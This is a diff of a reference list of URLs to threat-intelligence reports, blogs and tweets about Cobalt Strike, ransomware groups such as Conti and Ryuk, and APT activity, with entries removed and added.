- "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
- "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2",
- "https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks",
- "https://www.youtube.com/watch?v=borfuQGrB8g",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
- "https://asec.ahnlab.com/ko/19640/",
- "https://www.mandiant.com/resources/sabbath-ransomware-affiliate",
- "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/",
- "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
- "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/",
- "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b",
- "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
- "https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e",
- "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
- "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/",
- "https://twitter.com/ffforward/status/1324281530026524672",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf",
- "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
- "https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/",
- "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/",
- "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html",
- "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://twitter.com/felixw3000/status/1521816045769662468",
- "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://twitter.com/cglyer/status/1480742363991580674",
- "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/",
- "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
- "https://twitter.com/TheDFIRReport/status/1359669513520873473",
- "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
- "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671",
- "https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://www.youtube.com/watch?v=6SDdUVejR2w",
- "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/",
- "https://cert.gov.ua/article/619229",
- "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/",
- "https://www.mandiant.com/resources/evolution-of-fin7",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
- "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
- "https://morphuslabs.com/attackers-are-abusing-msbuild-to-evade-defenses-and-implant-cobalt-strike-beacons-edac4ab84f42",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
- "https://www.secureworks.com/research/threat-profiles/gold-waterfall",
- "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html",
- "https://www.prevailion.com/what-wicked-webs-we-unweave/",
- "https://bmcder.com/blog/extracting-cobalt-strike-from-windows-error-reporting",
- "https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/",
- "https://binary.ninja/2022/07/22/reverse-engineering-cobalt-strike.html",
- "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f",
- "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
- "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
- "https://attack.mitre.org/groups/G0096",
- "https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html",
- "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
- "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41",
- "https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts",
- "https://www.mandiant.com/resources/russian-targeting-gov-business",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-dupont",
- "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
- "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
- "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
- "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/",
- "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/",
- "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
- "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/",
- "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/",
- "https://intel471.com/blog/shipping-companies-ransomware-credentials",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection",
- "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/",
- "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md",
- "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/",
- "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/",
- "https://isc.sans.edu/diary/26752",
- "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/",
- "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/",
- "https://mez0.cc/posts/cobaltstrike-powershell-exec/",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/",
- "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
- "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
- "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/",
- "https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718",
- "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
- "https://twitter.com/swisscom_csirt/status/1354052879158571008",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
- "https://www.youtube.com/watch?v=C733AyPzkoc",
- "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
- "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://blog.macnica.net/blog/2020/11/dtrack.html",
- "https://twitter.com/Unit42_Intel/status/1458113934024757256",
- "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/",
- "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
- "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64",
- "https://blogs.blackberry.com/en/2022/01/log4u-shell4me",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf",
- "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
- "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
- "https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/",
- "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf",
- "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
- "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
- "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730",
- "https://www.youtube.com/watch?v=y65hmcLIWDY",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/",
- "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/",
- "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
- "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20",
- "https://zero.bs/cobaltstrike-beacons-analyzed.html",
- "https://www.arashparsa.com/catching-a-malware-with-no-name/",
- "https://www.varonis.com/blog/hive-ransomware-analysis",
- "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/",
- "https://insight-jp.nttsecurity.com/post/102ho8o/operation-restylink",
- "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/",
- "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/bb-ebook-finding-beacons-in-the-dark.pdf",
- "https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#",
- "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/",
- "https://kienmanowar.wordpress.com/2022/06/04/quicknote-cobaltstrike-smb-beacon-analysis-2/",
- "https://thedfirreport.com/2022/04/25/quantum-ransomware/",
- "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
- "https://twitter.com/TheDFIRReport/status/1356729371931860992",
- "https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/",
- "https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/",
- "https://www.bitsight.com/blog/emotet-botnet-rises-again",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
- "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf",
- "https://teamt5.org/en/posts/hiding-in-plain-sight-obscuring-c2s-by-abusing-cdn-services",
- "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
- "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/",
- "https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/",
- "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
- "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf",
- "https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/",
- "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
- "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
- "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/",
- "https://twitter.com/redcanary/status/1334224861628039169",
- "https://isc.sans.edu/diary/rss/28934",
- "https://blog.group-ib.com/apt41-world-tour-2021",
- "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
- "https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors",
- "https://thedfirreport.com/2022/03/07/2021-year-in-review/",
- "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
+ "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2",
+ "https://www.brighttalk.com/webcast/7451/462719",
+ "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery",
+ "https://isc.sans.edu/diary/27308",
+ "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir",
+ "https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/",
+ "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/",
+ "https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-011/",
+ "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems",
+ "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/",
+ "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html",
+ "https://github.com/chronicle/GCTI",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://www.cyberark.com/resources/threat-research/analyzing-malware-with-hooks-stomps-and-return-addresses-2",
+ "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/",
+ "https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/",
+ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
+ "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
+ "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py",
+ "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/",
+ "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b",
+ "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
"https://community.riskiq.com/article/c88cf7e6",
- "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/",
- "https://thedfirreport.com/2021/05/12/conti-ransomware/",
- "https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/",
- "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike",
- "https://skyblue.team/posts/scanning-virustotal-firehose/",
- "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors",
- "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/",
- "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel",
+ "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
+ "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists",
+ "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment",
+ "https://isc.sans.edu/diary/rss/28664",
+ "https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html",
+ "https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks",
+ "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://malwarebookreports.com/cryptone-cobalt-strike/",
+ "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/",
+ "https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/",
+ "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/",
+ "https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/",
+ "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/bb-ebook-finding-beacons-in-the-dark.pdf",
+ "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
+ "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/",
+ "https://www.mandiant.com/resources/apt41-us-state-governments",
+ "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1",
+ "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://twitter.com/AltShiftPrtScn/status/1403707430765273095",
+ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility",
+ "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection",
+ "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/",
+ "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
+ "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/",
+ "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
+ "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/",
+ "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/",
+ "https://isc.sans.edu/diary/rss/28752",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my",
+ "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
+ "https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/",
+ "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf",
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
+ "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
+ "https://www.aon.com/cyber-solutions/aon_cyber_labs/cobalt-strike-configuration-extractor-and-parser/",
+ "https://twitter.com/Unit42_Intel/status/1458113934024757256",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue",
- "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html",
- "https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/",
- "https://twitter.com/MBThreatIntel/status/1412518446013812737",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
- "https://web.br.de/interaktiv/ocean-lotus/en/",
- "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
+ "https://cert.gov.ua/article/703548",
+ "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis",
+ "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
+ "https://twitter.com/TheDFIRReport/status/1356729371931860992",
+ "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://www.malware-traffic-analysis.net/2021/09/29/index.html",
+ "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
"https://twitter.com/Unit42_Intel/status/1461004489234829320",
- "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
- "https://netresec.com/?b=214d7ff",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
+ "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
+ "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/",
+ "https://www.mandiant.com/media/10916/download",
+ "https://www.mandiant.com/resources/sabbath-ransomware-affiliate",
+ "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
+ "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims",
+ "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks",
+ "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
+ "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
+ "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/",
+ "https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://www.bitsight.com/blog/emotet-botnet-rises-again",
+ "https://twitter.com/TheDFIRReport/status/1359669513520873473",
+ "https://twitter.com/Cryptolaemus1/status/1407135648528711680",
"https://www.arashparsa.com/hook-heaps-and-live-free/",
"https://www.qurium.org/alerts/targeted-malware-against-crph/",
- "https://www.malware-traffic-analysis.net/2021/09/29/index.html",
- "https://bmcder.com/blog/cobalt-strike-dfir-listening-to-the-pipes",
- "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
- "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware",
- "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
- "https://isc.sans.edu/diary/28636",
- "https://blogs.blackberry.com/en/2021/11/zebra2104",
- "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf",
- "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
- "https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/",
- "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://www.inde.nz/blog/different-kind-of-zoombomb",
- "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/",
- "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153",
- "https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/",
- "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
- "https://twitter.com/VK_Intel/status/1294320579311435776",
+ "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/",
+ "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html",
